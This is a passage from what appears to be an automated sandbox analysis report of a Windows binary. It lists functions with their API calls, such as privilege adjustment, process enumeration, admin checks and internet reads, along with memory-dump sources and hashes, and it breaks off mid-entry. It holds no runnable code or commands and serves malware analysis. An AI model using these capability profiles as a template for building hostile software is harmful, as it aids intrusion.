                                                  • Opcode Fuzzy Hash: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
                                                  • Instruction Fuzzy Hash: 1AF04F35244204BFEB200FA5EC8DFAF3BACFF8B755B100029F945C6150CA61DD46EA60
                                                  Function 00C2C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C2C432
                                                  • CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2C44A
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • CoUninitialize.OLE32 ref: 00C2C6B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 9facf1c2053f95577bc9af0af9f0bcd7503fb8841e53f2a655d026505ec24b92
                                                  • Instruction ID: efbae338384aac0738461cf8ff09e221b8a50c8cde17aa844a4b07e7875fd4b5
                                                  • Opcode Fuzzy Hash: 9facf1c2053f95577bc9af0af9f0bcd7503fb8841e53f2a655d026505ec24b92
                                                  • Instruction Fuzzy Hash: 20A15C71104205AFD700EF54C885EAFB7E8FF99354F00496CF1969B192EB71EA49CB62
                                                  Function 00BC4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4AD0), ref: 00BC4B45
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BC4B57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
                                                  • Instruction ID: 4d1a0df20dd70cee7b43e65572512c2c7af18e55ed2d291a293bdf25ae636126
                                                  • Opcode Fuzzy Hash: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
                                                  • Instruction Fuzzy Hash: 2ED017B9A10713CFD7209F32E828F4A76E4FF06391B11887E9886D6150E770E881CA58
                                                  Function 00BD3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: a11b07c2e856ad13e9869a869bf692286da7a9e5ff9a7212b08e9ff111dc1bbe
                                                  • Instruction ID: c920978a58e10188d0af7de8650b7b7b98af9594a200f8c80f5bb65c4a07dca8
                                                  • Opcode Fuzzy Hash: a11b07c2e856ad13e9869a869bf692286da7a9e5ff9a7212b08e9ff111dc1bbe
                                                  • Instruction Fuzzy Hash: 9A2279716083019FD724DF24C891B6AF7E4AF84710F10496EF89A97392EB75EA44CB93
                                                  Function 00C3EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C3EE3D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C3EE4B
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C3EF0B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C3EF1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: da32ccb64ed61871f72956d544c1e2ecb7b650d33524690011311ed38ce2acb4
                                                  • Instruction ID: 6adf5ad2c6bacc06454c7958a783ada94d437a29a29960222a433f0129cbfd32
                                                  • Opcode Fuzzy Hash: da32ccb64ed61871f72956d544c1e2ecb7b650d33524690011311ed38ce2acb4
                                                  • Instruction Fuzzy Hash: 0D516A71504311ABD320EF24DC85F6FBBE8EF98750F10486DF596972A1EB70A909CB92
                                                  Function 00C1E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C1E628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 83e54e1b53e9bb9b074bd7d32ff0adf0ebe59bd5c7f21ec4cfca7f96d46d321a
                                                  • Instruction ID: ead00e9fcbf05095be165fd8af9af84e78845b7d9b5feb77bf678e7649762785
                                                  • Opcode Fuzzy Hash: 83e54e1b53e9bb9b074bd7d32ff0adf0ebe59bd5c7f21ec4cfca7f96d46d321a
                                                  • Instruction Fuzzy Hash: 1E322675A007059FDB28DF19C4819AAB7F0FF49320B15C46EE8AADB3A1D770E981DB44
                                                  Function 00C322EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C3180A,00000000), ref: 00C323E1
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C32418
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: 65c1e5382733702137950696af9e667c3afdbd7df77fc76051da561bacc27cb8
                                                  • Instruction ID: 82670df82e6f6eac203977893a5b84262759f469cf477ce67c9d6d679137c0e9
                                                  • Opcode Fuzzy Hash: 65c1e5382733702137950696af9e667c3afdbd7df77fc76051da561bacc27cb8
                                                  • Instruction Fuzzy Hash: 7D411571910209BFEF20DE96DC81FBFB7FCEB40324F10406AF615A6150EB759E419A50
                                                  Function 00C2B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B40B
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C2B465
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C2B4B2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 7fd1c7d1ce2af90e4d298f214a8baaa990dd8b887d7e9324d27028ea88879839
                                                  • Instruction ID: de680822307a81d37700c1d29649962b506edf0c21fb3b634243533e5b19be82
                                                  • Opcode Fuzzy Hash: 7fd1c7d1ce2af90e4d298f214a8baaa990dd8b887d7e9324d27028ea88879839
                                                  • Instruction Fuzzy Hash: BB213E35A00518EFDB00EFA5E884FEEBBB8FF49314F1480A9E905AB351DB319956CB51
                                                  Function 00C187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1882B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18858
                                                  • GetLastError.KERNEL32 ref: 00C18865
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 8cf89b1780744fa3ee559b0c062d46bc4be31e591b3268d0ee20994d652e1bdc
                                                  • Instruction ID: 522e1b1026abd617ccbdb663130125bf3c384a196675a3ff7174a7e65e4f2488
                                                  • Opcode Fuzzy Hash: 8cf89b1780744fa3ee559b0c062d46bc4be31e591b3268d0ee20994d652e1bdc
                                                  • Instruction Fuzzy Hash: A111BFB2814205AFE718EFA4DC85E6BB7F8FB45310B20852EF45583241EB70BC818B60
                                                  Function 00C1874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C18774
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C1878B
                                                  • FreeSid.ADVAPI32(?), ref: 00C1879B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
                                                  • Instruction ID: 31c122ce16e8961d60b83298125e34c040ae31f42fc68556efd9f41df03a24c0
                                                  • Opcode Fuzzy Hash: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
                                                  • Instruction Fuzzy Hash: A7F04979A1130CBFDF00DFF4DC89AAEBBBCFF09211F1044A9A901E2281E7756A448B50
                                                  Function 00C2C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2C6FB
                                                  • FindClose.KERNEL32(00000000), ref: 00C2C72B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 702cfecb339a5d04c1720737ebff918ec3669d95d708cca887de7c1cd1b98ad8
                                                  • Instruction ID: 7432e8d45fd62710a09a352a4aed033775cd515692a6bafd16bf3bdea2c07f48
                                                  • Opcode Fuzzy Hash: 702cfecb339a5d04c1720737ebff918ec3669d95d708cca887de7c1cd1b98ad8
                                                  • Instruction Fuzzy Hash: 5B118E766006009FDB10DF29D889A2EF7E9FF85760F00855DF9A9872A1DB30A801CB81
                                                  Function 00C2A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C39468,?,00C4FB84,?), ref: 00C2A097
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C39468,?,00C4FB84,?), ref: 00C2A0A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: b26402bc40d67854fc33c53f68ecd5c7fe4d5d36b8335633a8bfe3b1c10ff7d5
                                                  • Instruction ID: fe1e36fb2f5075a2b21e7a133c33989cba12dd4a23da288989b12faa59c1c244
                                                  • Opcode Fuzzy Hash: b26402bc40d67854fc33c53f68ecd5c7fe4d5d36b8335633a8bfe3b1c10ff7d5
                                                  • Instruction Fuzzy Hash: E1F0E23510422DABDB209FA4DC48FEE736CBF09361F0082AAF909D3181CA709A04CBA1
                                                  Function 00C181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18309), ref: 00C181E0
                                                  • CloseHandle.KERNEL32(?,?,00C18309), ref: 00C181F2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 12fca1a43c6ac5cad3d57e1b6c9d9af00d092849d8560d95e219da8836f6021f
                                                  • Instruction ID: e71fb896cd795e861a2e0a707a77bf38dcb966096532d510c628bf7a3389e84e
                                                  • Opcode Fuzzy Hash: 12fca1a43c6ac5cad3d57e1b6c9d9af00d092849d8560d95e219da8836f6021f
                                                  • Instruction Fuzzy Hash: D5E0E676014510AFE7262B61EC05E7777E9FF05310714887DF46584470DB615CD1DB10
                                                  Function 00BEA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BE8D57,?,?,?,00000001), ref: 00BEA15A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BEA163
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
                                                  • Instruction ID: 04ac208ba357b859e73ff42278c449a4342b67131382388673fcd02461c19c71
                                                  • Opcode Fuzzy Hash: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
                                                  • Instruction Fuzzy Hash: F1B09235054208ABCA002F91EC09F8C3F68FB46AA2F404024F60D84070CB6254528A91
                                                  Function 00BEF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51635e5fe44647a4fee297a83141774c18c9629fdb83330a46eb111c402348ab
                                                  • Instruction ID: 2ab5ed7b6da356b7dd8815968c9a5e44f798aef6df277f97d790823ef82f3ac1
                                                  • Opcode Fuzzy Hash: 51635e5fe44647a4fee297a83141774c18c9629fdb83330a46eb111c402348ab
                                                  • Instruction Fuzzy Hash: D0320525D29F424ED7239635D872339A289AFB73C5F15D737F81AB59A6EB28C4C34100
                                                  Function 00BF242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 019b39047840328a2163debab5ae92ba50136efa9ff5af6910ceacd2b4cc8b29
                                                  • Instruction ID: 45a320a62be04406703accfd4628657bc22bffb048b28982c67d372c204511a0
                                                  • Opcode Fuzzy Hash: 019b39047840328a2163debab5ae92ba50136efa9ff5af6910ceacd2b4cc8b29
                                                  • Instruction Fuzzy Hash: E9B1E324D2AF414DD7239639883133ABA9CAFBB2DAF51E71BFC1674D22EB2185C34141
                                                  Function 00C28889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __time64.LIBCMT ref: 00C2889B
                                                    • Part of subcall function 00BE520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C28F6E,00000000,?,?,?,?,00C2911F,00000000,?), ref: 00BE5213
                                                    • Part of subcall function 00BE520A: __aulldiv.LIBCMT ref: 00BE5233
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: d5d299bcd3a76f117848d6b13828974cf7206fd6a0d2ecd3ea0d4a32002139f2
                                                  • Instruction ID: a08d6adc7d3d3911bdd5e42f200bc59cf709104e5ded4eaaa82b5a7b7a0cffcf
                                                  • Opcode Fuzzy Hash: d5d299bcd3a76f117848d6b13828974cf7206fd6a0d2ecd3ea0d4a32002139f2
                                                  • Instruction Fuzzy Hash: 6421AF726256208BC729CF29D841B56B3E1EBA5311F688E6CD1F5CB2C0CA74B909CB94
                                                  Function 00C24C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C24C76
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
